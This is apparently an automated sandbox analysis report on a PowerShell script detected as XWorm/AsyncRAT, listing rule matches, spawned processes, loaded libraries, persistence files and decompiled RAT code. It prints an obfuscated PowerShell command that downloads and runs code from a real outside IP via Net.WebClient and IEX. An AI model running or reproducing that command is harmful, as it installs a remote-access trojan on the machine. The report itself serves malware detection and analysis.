Source: 7.3.csc.exe.4ff46b8.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.csc.exe.4ff46b8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000003.2297360243.0000000004FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000003.2295875521.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.4667563397.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.expl.evad.winPS1@17/15@0/2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\QsOwMXrJgXTZTM1E
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4140:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cizgxqa5.ti0.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\cmd.bat" "

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: b.ps1

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\b.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\cmd.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')\|IEX"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF06A.tmp" "c:\Users\user\AppData\Local\Temp\n1s2ptvo\CSC91C88865B5A942288A2995E4BC5B419D.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\cmd.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')\|IEX"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF06A.tmp" "c:\Users\user\AppData\Local\Temp\n1s2ptvo\CSC91C88865B5A942288A2995E4BC5B419D.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 10_2_00D67DA0 push eax; iretd

10_2_00D67DA1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

